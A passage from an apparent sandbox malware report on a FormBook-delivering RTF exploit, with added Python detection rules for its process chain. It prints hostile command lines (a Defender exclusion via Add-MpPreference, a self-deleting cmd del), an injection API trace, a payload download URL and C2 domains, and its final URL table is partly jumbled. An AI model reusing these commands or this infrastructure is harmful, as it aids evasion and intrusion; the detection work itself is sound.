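    {"pid": 3756, "api": "NtWriteVirtualMemory", "target_pid": 4020,
     "args": {"base": 0x400000, "data": b"MZ\x90\x00"}},
    {"pid": 3756, "api": "NtMapViewOfSection", "target_pid": 4020, "args": {"protect": 0x40}},
    {"pid": 3756, "api": "NtSetContextThread", "target_pid": 4020, "args": {}},
    {"pid": 3756, "api": "NtResumeThread", "target_pid": 4020, "args": {}},
    # ihbgfbin.exe maps an RWX section into explorer.exe (1244) and queues an APC
    {"pid": 3756, "api": "NtMapViewOfSection", "target_pid": 1244, "args": {"protect": 0x40}},
    {"pid": 3756, "api": "NtQueueApcThread", "target_pid": 1244, "args": {}},
    # Benign noise: a process touching its own memory
    {"pid": 1340, "api": "NtWriteVirtualMemory", "target_pid": 1340, "args": {"data": b"\x00\x01"}},
]

if __name__ == "__main__":
    for (src, dst), verdict in analyse_trace(SAMPLE_TRACE).items():
        print(f"pid {src} -> pid {dst}: {verdict}")
```

The verdict deliberately requires a write or RWX mapping and a thread hijack in the same source/target pair: an unmap alone, or an APC alone, is also produced by legitimate loaders and debuggers, so a single stage is kept as evidence but does not fire.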
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\ihbgfbin.exe "C:\Users\user\AppData\Roaming\ihbgfbin.exe"
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ihbgfbin.exe"
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe Process created: C:\Users\user\AppData\Roaming\ihbgfbin.exe "C:\Users\user\AppData\Roaming\ihbgfbin.exe"
Source: C:\Windows\SysWOW64\mstsc.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\ihbgfbin.exe"
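The process tree above (EQNEDT32.EXE starting an executable from AppData\Roaming, that executable launching powershell.exe with Add-MpPreference -ExclusionPath, and the injected mstsc.exe removing the dropper through cmd.exe /c del) is the sequence a process-creation rule set should catch. The following is an added example, not the report's code and not the text of any Sigma rule, that implements those three checks over Sysmon-style process-creation records. It generalises the Defender-exclusion check to -EncodedCommand payloads (the command line captured here is in clear text), and the Office parent list to the other Office binaries. Field names follow Sysmon Event ID 1; the rule names, the directory pattern and the sample events are assumptions constructed for this example.

```python
"""Process-creation rules for the dropper chain this report shows.

Added example, not part of the Joe Sandbox report. Events are constructed
Sysmon Event ID 1 style records (Image, ParentImage, CommandLine).
"""
import base64
import re
from pathlib import PureWindowsPath

# Assumed parent list: Equation Editor plus the main Office applications.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}
# Assumed user-writable locations a dropper typically lands in.
USER_WRITABLE = re.compile(r"^c:\\users\\[^\\]+\\(appdata|downloads|desktop|documents)\\", re.I)


def _basename(path):
    return PureWindowsPath(path).name.lower()


def _decoded_command_line(cmdline):
    """Append the decoded -EncodedCommand payload (base64 of UTF-16LE) if one is present."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return cmdline
    try:
        return cmdline + " " + base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline


def rule_office_spawns_user_binary(ev):
    """Office / Equation Editor starting an executable out of a user-writable directory."""
    return (_basename(ev["ParentImage"]) in OFFICE_PARENTS
            and USER_WRITABLE.search(ev["Image"]) is not None)


def rule_defender_exclusion(ev):
    """PowerShell adding a Defender exclusion, in clear text or via -EncodedCommand."""
    if _basename(ev["Image"]) != "powershell.exe":
        return False
    cl = _decoded_command_line(ev["CommandLine"])
    return (re.search(r"add-mppreference", cl, re.I) is not None
            and re.search(r"-exclusion(path|process|extension)", cl, re.I) is not None)


def rule_self_delete_via_cmd(ev):
    """cmd.exe /c del of an executable that lives in a user-writable directory."""
    if _basename(ev["Image"]) != "cmd.exe":
        return False
    m = re.search(r'/c\s+del\s+"?([^"]+\.exe)"?', ev["CommandLine"], re.I)
    return bool(m) and USER_WRITABLE.search(m.group(1)) is not None


RULES = [rule_office_spawns_user_binary, rule_defender_exclusion, rule_self_delete_via_cmd]


def evaluate(events):
    """Return [(event index, rule name)] for every rule that matches an event."""
    return [(i, rule.__name__) for i, ev in enumerate(events) for rule in RULES if rule(ev)]


# Constructed events modelled on the report's process tree (not real telemetry).
_ENCODED = base64.b64encode(
    'Add-MpPreference -ExclusionPath "C:\\Users\\user\\AppData\\Roaming"'.encode("utf-16-le")
).decode()
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\user\AppData\Roaming\ihbgfbin.exe",
     "ParentImage": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "CommandLine": r'"C:\Users\user\AppData\Roaming\ihbgfbin.exe"'},
    {"Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Users\user\AppData\Roaming\ihbgfbin.exe",
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                    r'Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ihbgfbin.exe"'},
    {"Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Users\user\AppData\Roaming\ihbgfbin.exe",
     "CommandLine": "powershell.exe -enc " + _ENCODED},
    {"Image": r"C:\Windows\SysWOW64\cmd.exe",
     "ParentImage": r"C:\Windows\SysWOW64\mstsc.exe",
     "CommandLine": r'/c del "C:\Users\user\AppData\Roaming\ihbgfbin.exe"'},
    # Benign: Word started from the shell, and an admin reading Defender settings.
    {"Image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "WINWORD.EXE /n"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "powershell.exe Get-MpPreference"},
]

if __name__ == "__main__":
    for index, name in evaluate(SAMPLE_EVENTS):
        print(f"event {index}: {name}")
```

The exclusion rule matches on the cmdlet and parameter names rather than on the excluded path, so the same rule fires whether the sample excludes its own file, its directory or a process name; on a live host, the resulting exclusion can be confirmed with Get-MpPreference (ExclusionPath, ExclusionProcess, ExclusionExtension) before it is removed.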
Source: explorer.exe, 00000009.00000000.420803319.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.928404044.00000000001D6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progman-
Source: explorer.exe, 00000009.00000000.420880686.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.928557977.0000000000720000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000009.00000000.420880686.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.928557977.0000000000720000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000009.00000000.420880686.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.928557977.0000000000720000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: !Progman
Source: C:\Windows\SysWOW64\mstsc.exe Code function: GetLocaleInfoW,wcsncmp, 10_2_0096770C
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe Queries volume information: C:\Users\user\AppData\Roaming\ihbgfbin.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_00964143 GetSystemTime,SystemTimeToFileTime,GetLastError,10_2_00964143
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0095B0AA GetUserNameExW,GetLastError,wcschr,GetComputerNameW,GetLastError,GetLastError,GetLastError,_wcsnicmp,10_2_0095B0AA
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0092395D GetVersionExW,CoInitialize,CoCreateInstance,SysFreeString,CoUninitialize,10_2_0092395D
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
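The four "Process created" lines above form the chain a detection engineer wants to catch from endpoint telemetry alone: the Equation Editor spawning a binary from AppData, that binary excluding itself from Defender through PowerShell, relaunching itself (the staging step for the hollowing recorded above), and an injected mstsc.exe deleting the dropper afterwards. The following is an added example, not Joe Sandbox code: it replays those four events as Sysmon-style records (the field names parent_image, image and command_line are an assumption about the log source) and also covers the base64 -EncodedCommand variant of the exclusion, since only the command-line form appears in this report.

```python
"""Detection logic for the process-creation chain recorded in this report.

Added example (not Joe Sandbox code). OBSERVED is constructed from the
'Process created' lines of the report; field names follow Sysmon Event ID 1
and are an assumption about the log source.
"""
import base64
import re
from dataclasses import dataclass
from typing import List, Set, Tuple

# Office processes that should never spawn arbitrary children; EQNEDT32.EXE is
# the Equation Editor abused by CVE-2017-11882 / CVE-2018-0802.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\appdata\\", re.IGNORECASE)
DEFENDER_EXCLUSION = re.compile(
    r"add-mppreference\b.*-exclusion(?:path|process|extension)", re.IGNORECASE)
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
SELF_DELETE = re.compile(r'\bdel\s+"?([^"]+?)"?\s*$', re.IGNORECASE)


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def encode_command(script: str) -> str:
    """PowerShell's -EncodedCommand is base64 over UTF-16LE, not UTF-8."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def effective_command_line(cmd: str) -> str:
    """Decode an -EncodedCommand payload in place so the exclusion regex also
    fires on the base64 variant; malformed payloads leave the line untouched."""
    m = ENCODED_ARG.search(cmd)
    if not m:
        return cmd
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmd
    return cmd[:m.start()] + decoded + cmd[m.end():]


def classify(ev: ProcEvent, seen_images: Set[str]) -> List[str]:
    parent, child = basename(ev.parent_image), basename(ev.image)
    cmd = effective_command_line(ev.command_line)
    tags: List[str] = []
    if parent in OFFICE_PARENTS:
        tags.append("office_child_process")
        if USER_WRITABLE.search(ev.image):
            tags.append("user_dir_binary_from_office")
    if parent == "eqnedt32.exe":
        tags.append("equation_editor_spawn")
    if child == "powershell.exe" and DEFENDER_EXCLUSION.search(cmd):
        tags.append("defender_exclusion_added")
    if child == parent and USER_WRITABLE.search(ev.image):
        tags.append("self_respawn_from_appdata")  # typical hollowing staging
    m = SELF_DELETE.search(cmd)
    if m and basename(m.group(1)) in seen_images:
        tags.append("deletes_earlier_dropped_binary")
    return tags


def analyze(events: List[ProcEvent]) -> List[Tuple[int, str, str]]:
    """Return (event index, image name, tag) for every rule that fires.
    Events are processed in order so a later 'del' can refer back to an image
    that was executed earlier in the chain."""
    seen: Set[str] = set()
    findings: List[Tuple[int, str, str]] = []
    for idx, ev in enumerate(events):
        for tag in classify(ev, seen):
            findings.append((idx, basename(ev.image), tag))
        seen.add(basename(ev.image))
    return findings


# Constructed from the report's four 'Process created' lines.
DROPPER = r"C:\Users\user\AppData\Roaming\ihbgfbin.exe"
OBSERVED = [
    ProcEvent(r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
              DROPPER, '"' + DROPPER + '"'),
    ProcEvent(DROPPER, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
              r'Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ihbgfbin.exe"'),
    ProcEvent(DROPPER, DROPPER, '"' + DROPPER + '"'),
    ProcEvent(r"C:\Windows\SysWOW64\mstsc.exe", r"C:\Windows\SysWOW64\cmd.exe",
              r'/c del "C:\Users\user\AppData\Roaming\ihbgfbin.exe"'),
]
# Constructed variant (not in the report): the same exclusion via -EncodedCommand.
ENCODED_VARIANT = ProcEvent(
    DROPPER, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
    "powershell.exe -nop -w hidden -enc "
    + encode_command('Add-MpPreference -ExclusionPath "' + DROPPER + '"'))

if __name__ == "__main__":
    for idx, image, tag in analyze(OBSERVED + [ENCODED_VARIANT]):
        print(f"event {idx}: {image}: {tag}")
```

The rules are deliberately independent of the dropper's name: the Equation Editor parent, the AppData path, the Add-MpPreference cmdlet and the deletion of a previously executed image are what generalise to other FormBook deliveries.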

Stealing of Sensitive Information

Source: Yara match | File source: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.928452620.0000000000410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.429526201.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.928419013.0000000000390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.422078924.0000000003D27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match | File source: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.928452620.0000000000410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.429526201.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.928419013.0000000000390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.422078924.0000000003D27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0095CA2C LocalAlloc,CreateWellKnownSid,GetLastError,RpcBindingSetAuthInfoExW,LocalFree,RpcBindingFree,10_2_0095CA2C
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0095C3D8 memset,GetCurrentProcessId,ProcessIdToSessionId,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,RpcBindingFree,10_2_0095C3D8
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_00960486 RpcStringBindingComposeW,RpcBindingFromStringBindingW,RpcStringFreeW,10_2_00960486
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0096061E RpcBindingSetAuthInfoExW,LocalFree,RpcBindingSetAuthInfoExW,RpcBindingFree,10_2_0096061E
MITRE ATT&CK Matrix

Only the cells the report highlights for this sample are listed below; the number in parentheses is the badge value shown in that cell, kept as extracted. The remaining cells of the grid are the unhighlighted ATT&CK template and are omitted here.

Reconnaissance, Resource Development, Initial Access, Lateral Movement, Exfiltration, Impact: no highlighted techniques
Execution: Native API (1); Shared Modules (1); Exploitation for Client Execution (33); Command and Scripting Interpreter (1)
Persistence: DLL Side-Loading (1)
Privilege Escalation: Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Process Injection (612)
Defense Evasion: Disable or Modify Tools (11); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (4); Install Root Certificate (1); Software Packing (12); DLL Side-Loading (1); Rootkit (1); Masquerading (1); Virtualization/Sandbox Evasion (41); Process Injection (612)
Credential Access: Credential API Hooking (1)
Discovery: System Time Discovery (1); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (225); Security Software Discovery (221); Process Discovery (2); Virtualization/Sandbox Evasion (41); Application Window Discovery (11); System Owner/User Discovery (1); Remote System Discovery (1)
Collection: Archive Collected Data (1); Screen Capture (1); Credential API Hooking (1)
Command and Control: Ingress Tool Transfer (15); Encrypted Channel (2); Non-Application Layer Protocol (3); Application Layer Protocol (123)
Behavior Graph (ID 1545184, sample na.doc, start date 30/10/2024, architecture WINDOWS, score 100), rendered as a process tree. Counters in parentheses after a process are the graph's created-registry-values / created-files badges.

Start: DNS www.trygenesisx.com
  Sample-level signatures: Initial sample is an obfuscated RTF file; Suricata IDS alerts for network traffic; Found malware configuration; 17 other signatures
  WINWORD.EXE (291 / 18)
    dropped: C:\Users\user\Desktop\~$na.doc, data
    EQNEDT32.EXE (11)
      network: 87.120.84.38, local port 49163 to port 80, SHARCOM-ASBG, Bulgaria
      dropped: C:\Users\user\AppData\Roaming\ihbgfbin.exe, PE32
      dropped: C:\Users\user\...\4q0pGnqqpgTTSL7[1].exe, PE32
      signatures: Office equation editor establishes network connection; Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
      ihbgfbin.exe (3)
        signatures: Machine Learning detection for dropped file; Adds a directory exclusion to Windows Defender; Tries to detect virtualization through RDTSC time measurements; 2 other signatures
        ihbgfbin.exe (second instance)
          signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
          explorer.exe (injected; 1 / 3)
            DNS: www.thecareskin.com; www.opmk.monster; 9 other IPs or domains
            signatures: System process connects to network (likely due to code injection or exploit)
            mstsc.exe
              signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; 2 other signatures
              cmd.exe
        powershell.exe (4)
          signatures: Installs new ROOT certificates
    EQNEDT32.EXE (second instance)

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample (Source | Detection | Scanner | Label)
na.doc | 39% | ReversingLabs | Document-RTF.Exploit.CVE-2017-11882
na.doc | 100% | Avira | HEUR/Rtf.Malformed

Dropped Files (Source | Detection | Scanner)
C:\Users\user\AppData\Roaming\ihbgfbin.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\4q0pGnqqpgTTSL7[1].exe | 100% | Joe Sandbox ML

Unpacked PE Files: No Antivirus matches
Domains: No Antivirus matches

URLs (Source | Detection | Scanner | Label)
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://support.mozilla.org | 0% | URL Reputation | safe
Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation)
thecareskin.com | 13.248.213.45 | true | true | - | unknown
fcno30.com | 68.66.226.117 | true | true | - | unknown
www.education2jobs.com | unknown | unknown | true | - | unknown
www.launchyouglobal.com | unknown | unknown | true | - | unknown
www.thecareskin.com | unknown | unknown | true | - | unknown
www.opmk.monster | unknown | unknown | true | - | unknown
www.trygenesisx.com | unknown | unknown | false | - | unknown
www.mbbwa4wp.cfd | unknown | unknown | true | - | unknown
www.fcno30.com | unknown | unknown | true | - | unknown
www.lifeofthobes.uk | unknown | unknown | true | - | unknown
www.ko-or-a-news.com | unknown | unknown | true | - | unknown
www.affirmationtotebags.com | unknown | unknown | true | - | unknown
Contacted URLs (Name | Malicious | Antivirus Detection | Reputation)
http://87.120.84.38/txt/4q0pGnqqpgTTSL7.exe | true | - | unknown
www.lifeofthobes.uk/btrd/ | true | - | unknown
URLs from Memory and Binaries (Name | Source | Malicious | Antivirus Detection | Reputation)
Strings such as "...comReferer:" or "...exeC:" are the memory strings as found, with the bytes that followed the URL in memory still attached. [E1] stands for the memory dump explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmp.
http://www.gynlkj.comReferer: | [E1] | false | - | unknown
http://www.docemimocasamentos.com/btrd/www.solarcyborg.com | [E1] | false | - | unknown
http://87.120.84.38/txt/4q0pGnqqpgTTSL7.exettC: | EQNEDT32.EXE, 00000002.00000002.408279812.00000000008DF000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
http://www.docemimocasamentos.com | [E1] | false | - | unknown
http://www.fcno30.com/btrd/ | [E1] | false | - | unknown
http://www.mbbwa4wp.cfd/btrd/www.fcno30.com | [E1] | false | - | unknown
http://www.thecareskin.com/btrd/www.opmk.monster | [E1] | false | - | unknown
http://www.education2jobs.comReferer: | [E1] | false | - | unknown
http://www.martline.website/btrd/www.affirmationtotebags.com | [E1] | false | - | unknown
http://www.ko-or-a-news.com | [E1] | false | - | unknown
http://www.ko-or-a-news.com/btrd/ | [E1] | false | - | unknown
http://www.trygenesisx.com/btrd/ | [E1] | false | - | unknown
http://www.martline.website/btrd/ | [E1] | false | - | unknown
http://www.opmk.monsterReferer: | [E1] | false | - | unknown
http://www.affirmationtotebags.com | [E1] | false | - | unknown
http://www.mbbwa4wp.cfdReferer: | [E1] | false | - | unknown
http://www.affirmationtotebags.com/btrd/www.mbbwa4wp.cfd | [E1] | false | - | unknown
http://www.jejeesclothing.com/btrd/www.nashexshop.com | [E1] | false | - | unknown
http://www.gynlkj.com/btrd/ | [E1] | false | - | unknown
http://www.ko-or-a-news.com/btrd/www.launchyouglobal.com | [E1] | false | - | unknown
http://www.autoitscript.com/autoit3 | explorer.exe, 00000009.00000000.420803319.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.928404044.00000000001D6000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
http://www.fcno30.comReferer: | [E1] | false | - | unknown
http://www.opmk.monster/btrd/www.martline.website | [E1] | false | - | unknown
http://www.launchyouglobal.com/btrd/ | [E1] | false | - | unknown
http://www.trygenesisx.com | [E1] | false | - | unknown
http://www.solarcyborg.com | [E1] | false | - | unknown
http://www.lifeofthobes.uk | [E1] | false | - | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | ihbgfbin.exe, 00000005.00000002.421951115.0000000002524000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.martline.website | [E1] | false | - | unknown
http://www.thecareskin.com | [E1] | false | - | unknown
http://www.fcno30.com | [E1] | false | - | unknown
http://www.launchyouglobal.com/btrd/www.trygenesisx.com | [E1] | false | - | unknown
http://www.gynlkj.com/btrd/www.docemimocasamentos.com | [E1] | false | - | unknown
http://www.mbbwa4wp.cfd/btrd/ | [E1] | false | - | unknown
http://www.piriform.com/ccleanerxe | explorer.exe, 00000009.00000002.928878903.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.421597302.000000000260E000.00000004.00000001.00020000.00000000.sdmp | false | - | unknown
http://www.trygenesisx.comReferer: | [E1] | false | - | unknown
http://www.ko-or-a-news.comReferer: | [E1] | false | - | unknown
http://www.jejeesclothing.comReferer: | [E1] | false | - | unknown
http://www.nashexshop.com/btrd/ | [E1] | false | - | unknown
http://www.opmk.monster | [E1] | false | - | unknown
http://www.nashexshop.com | [E1] | false | - | unknown
http://www.solarcyborg.com/btrd/ | [E1] | false | - | unknown
http://www.education2jobs.com/btrd/www.lifeofthobes.uk | [E1] | false | - | unknown
http://www.solarcyborg.comReferer: | [E1] | false | - | unknown
http://www.education2jobs.com | [E1] | false | - | unknown
http://www.mbbwa4wp.cfd | [E1] | false | - | unknown
http://www.education2jobs.com/btrd/ | [E1] | false | - | unknown
http://www.affirmationtotebags.comReferer: | [E1] | false | - | unknown
http://www.nashexshop.comReferer: | [E1] | false | - | unknown
http://www.lifeofthobes.uk/btrd/www.thecareskin.com | [E1] | false | - | unknown
http://www.affirmationtotebags.com/btrd/ | [E1] | false | - | unknown
http://www.docemimocasamentos.com/btrd/ | [E1] | false | - | unknown
http://www.jejeesclothing.com | [E1] | false | - | unknown
http://www.solarcyborg.com/btrd/PUS | [E1] | false | - | unknown
http://www.martline.websiteReferer: | [E1] | false | - | unknown
http://87.120.84.38/txt/4q0pGnqqpgTTSL7.exeC: | EQNEDT32.EXE, 00000002.00000002.408279812.00000000008DF000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
http://java.sun.com | explorer.exe, 00000009.00000000.420803319.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.928404044.00000000001D6000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
http://www.fcno30.com/btrd/www.ko-or-a-news.com | [E1] | false | - | unknown
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | explorer.exe, 00000009.00000000.421850492.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.422336388.0000000007524000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.928878903.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.929382715.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.421597302.000000000260E000.00000004.00000001.00020000.00000000.sdmp | false | - | unknown
                                                                                                                                                      unknown
                                                                                                                                                      http://www.gynlkj.comexplorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        http://www.thecareskin.comReferer:explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          http://www.docemimocasamentos.comReferer:explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            http://www.launchyouglobal.comexplorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              http://www.thecareskin.com/btrd/explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                http://www.launchyouglobal.comReferer:explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  http://www.piriform.com/ccleanerexplorer.exe, 00000009.00000000.421850492.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.422336388.0000000007524000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.928878903.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.929382715.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.421597302.000000000260E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    http://87.120.84.38/txt/4q0pGnqqpgTTSL7.exejEQNEDT32.EXE, 00000002.00000002.408279812.00000000008DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      http://www.lifeofthobes.uk/btrd/explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        http://www.trygenesisx.com/btrd/www.jejeesclothing.comexplorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          https://support.mozilla.orgexplorer.exe, 00000009.00000000.420803319.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.928404044.00000000001D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          http://www.nashexshop.com/btrd/www.gynlkj.comexplorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            http://www.jejeesclothing.com/btrd/explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                              unknown
